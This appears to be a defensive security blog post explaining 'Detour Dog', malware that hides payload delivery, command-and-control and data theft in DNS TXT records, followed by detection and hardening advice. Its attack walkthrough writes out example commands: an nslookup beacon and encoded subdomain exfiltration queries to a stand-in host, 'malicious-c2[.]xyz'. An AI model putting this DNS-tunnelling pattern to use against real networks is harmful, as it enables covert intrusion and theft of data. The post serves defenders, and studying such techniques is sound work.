Skip to content 
Cybercriminals are no longer just breaking in; they’re learning to blend in. A new, worrying type of malware called “Detour Dog” hides by using parts of the internet that people usually trust. Instead of using obvious methods, it stores and receives information through DNS TXT records — tiny pieces of text that are normally harmless. Detour Dog uses those records to scout targets, download its harmful software, and send and receive instructions from its operators. Because it operates through this trusted channel, it can avoid normal security alerts.
Unlike classic malware that downloads executables over HTTP, “Detour Dog” leverages DNS, a protocol so fundamental that it’s rarely scrutinized. This blog explains how it works, walks through a realistic attack scenario, and includes a safe, ethical demonstration to illustrate the technique.
Why DNS TXT Records Are a Perfect Cover?
Initially, DNS TXT records were designed to contain easy-to-read, human-friendly comments regarding a domain – such as contact information or explanations. Eventually, they became the preferred means for email security protocols such as SPF, DKIM, and DMARC. However, due to their extreme flexibility and frequent disregard by security tools, TXT records have become an attractive target for the exploitation of cybercriminals. In contrast to web traffic (HTTP/HTTPS), DNS requests are normally allowed to go through firewalls with only a slight check. Thus, attackers are able to insert malicious instructions or data to TXT records almost unnoticed by security solutions which are focused on blocking suspicious websites or known malware.
Enter “Detour Dog”
First spotted in early 2025, Detour Dog represents the next stage in stealth malware evolution. Its infection typically starts with something ordinary a phishing email or a compromised application.
After the victim executes the file, the malware refrains from downloading anything via HTTP. Rather, it carries out a DNS TXT query to a domain owned by the attacker. The text hidden in the response is not innocent information; it is an encoded script or payload.
The malware decodes that data directly in memory and executes it as a fileless attack technique that avoids writing anything to disk. From there, Detour Dog uses DNS TXT records for everything: receiving new commands, sending updates, and exfiltrating sensitive information, all disguised as normal DNS traffic.
This use of DNS for both payload delivery and command-and-control (C2) makes it extremely hard to detect. Many Endpoint Detection and Response (EDR) platforms, firewalls, and SIEMs aren’t tuned to monitor DNS behavior closely enough to spot this kind of abuse.
Example Scenario: How “Detour Dog” Infects a Corporate Workstation
Below is a clear, practical attack chain showing how Detour Dog-style malware would operate in a mid-sized financial firm that has a firewall, email filtering and EDR on endpoints but no DNS-layer security.
Step-by-Step Attack Flow:
- Initial Compromise:
An employee opens a phishing Word document and enables macros. The macro runs automatically and drops a small program called loader.exe onto the machine.
- Loader Execution:
loader.exe runs and performs a DNS TXT query to stage.malicious-c2[.]xyz.
- Payload Retrieval via TXT:
The attacker’s DNS server responds with:
| “TVqQAAMAAAA…[Base64-encoded shellcode]…” |
The loader decodes this string from Base64, injects it into memory as reflective shellcode, and executes it, bypassing disk-based AV.
- Establishing C2:
The in-memory payload now acts as a beacon. Every 60 seconds, it queries:
| nslookup -type=TXT cmd.malicious-c2[.]xyz |
The TXT response might be:
“aWQ9MTIzO2NtZD1kYXRhX2V4ZmlsdHJhdGlvbg==”
Decoded: id=123;cmd=data_exfiltration
- Data Exfiltration:
The malware compresses sensitive files, encodes them in Base32, and sends them via subdomain queries:
| abcd1234.malicious-c2[.]xyz efgh5678.malicious-c2[.]xyz |
The attacker’s DNS server logs these queries and reconstructs the stolen data.
Throughout this process, no HTTP/S traffic leaves the network, and no suspicious files are written to disk. Traditional SIEM alerts remain silent.
Why This Matters
The consequences are huge:
Avoidance of typical security measures: Generally, firewalls, proxies, and certain IDSs only consider the most straightforward DNS lookups (converting names into IPs). They hardly ever inspect the details of DNS responses. Hence, attackers can embed instructions and data within DNS records and those security tools might not detect them at all.
Continuity: Since DNS is a service of the infrastructure that is always available even after reboots and network changes, DNS-based command-and-control is still able to operate after a machine is restarted. If the malware employs methods such as DGAs (automatically generating a large number of domain names) or fast-flux (rapidly changing the IPs for a domain), then it is becoming increasingly difficult to block or create a sinkhole.
Mimicking: DNS traffic is ubiquitous in corporate networks. A few more TXT queries (or strange DNS names) can very well be considered normal noise, hence malicious DNS activity can be drowned in the sea of legitimate requests.
Historic incident
- In the campaign known as DNSMessenger, the threat actors initially staged a PowerShell loader through a macro-enabled Word document. To avoid detection, the infected machine did not use HTTP to download the files but rather it looked up a DNS domain controlled by the attackers for TXT records. The retrieved TXT records were Base64 strings of commands that were merged and decoded, then the commands were run locally, henceforth allowing remote control and data exfiltration over DNS while not giving away to the usual traffic logs.
Ref, DNSMessenger PowerShell Malware Analysis
- The threat actor dubbed Detour Dog was observed in late 2025 distributing the infostealer Strela Stealer via a novel DNS-based channel. Compromised websites issued DNS TXT lookups to domains under Detour Dog control; the responses contained encoded instructions or download redirections. The campaign reportedly infected over 30,000 websites and leveraged TXT-based C2 and payload delivery to avoid detection.
Ref, Dangerous DNS malware infects over 30,000 websites – so be on your guard | TechRadar
How to Detect & Defend Against TXT-Based Malware
- Monitor DNS Anomalies
- Frequent TXT queries from workstations
- TXT responses >100 bytes from non-email domains
- Unusual query timing (e.g., every 60 seconds)
- Deploy DNS-Layer Security
Use services like:
- Cisco Umbrella
- Palo Alto DNS Security
- Cloudflare Gateway
These can block known malicious domains and flag abnormal TXT usage.
- Enable DNS Logging & Analytics
- Centralize DNS logs in your SIEM. Create alerts for:
- TXT queries to newly registered domains
- High entropy in subdomains (data exfiltration)
- Restrict Outbound DNS
- Force all the internal clients to use your internal DNS resolver to block direct external DNS (e.g, 8.8.8.8).
- Harden Endpoints
- Disable unnecessary PowerShell execution
- Enable AMSI (Antimalware Scan Interface)
- Use application allowlisting
Conclusion
“Detour Dog” isn’t theoretical it reflects a real-world trend where attackers hide behind trusted infrastructure instead of exploiting obvious vulnerabilities.By embedding malicious code and communication inside DNS TXT records, adversaries gain stealth, persistence, and control with minimal risk of detection.
But this isn’t undefendable. With DNS-aware visibility, anomaly-based monitoring, and strict egress controls, defenders can uncover these hidden channels before data leaves the network.
The lesson? Trust nothing, even the protocols that keep the internet running. In cybersecurity, the quietest traffic is often the most dangerous.
Reference: